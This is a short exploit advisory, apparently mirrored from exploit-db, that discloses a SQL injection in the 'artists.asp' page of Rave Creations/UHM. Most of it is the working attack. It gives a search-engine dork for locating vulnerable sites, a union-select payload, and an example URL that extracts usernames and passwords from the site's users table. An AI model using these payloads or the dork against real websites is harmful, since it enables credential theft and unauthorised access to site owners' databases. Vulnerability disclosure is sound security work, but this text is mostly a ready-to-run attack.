Rave Creations/UHM – ‘artists.asp’ SQL Injection - 体验盒子

作者： Ra3cH

日期： 2010-05-22

类别：

webapps

平台：

asp

来源：https://www.exploit-db.com/exploits/12701/

************************************************************
**(artists.asp) SQL Injection Vulnerability 
************************************************************
**Prodcut:Rave Creations/UHM 
**Home : N/A
**Vunlerability :SQL Injection
**Risk:High
**Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
************************************************************
** Discovred by:Ra3cH
** From :Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members ofhttp://www.DZ4All.cOm/Cc
**And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... 
************************************************************
**Exploit:
**
**http://[PATH]/artists.asp?id=(SQL)
**
**SQL=union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users
**
************************************************************
**Exemple:
**
**
**http://[site]/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users
**
***********************************************************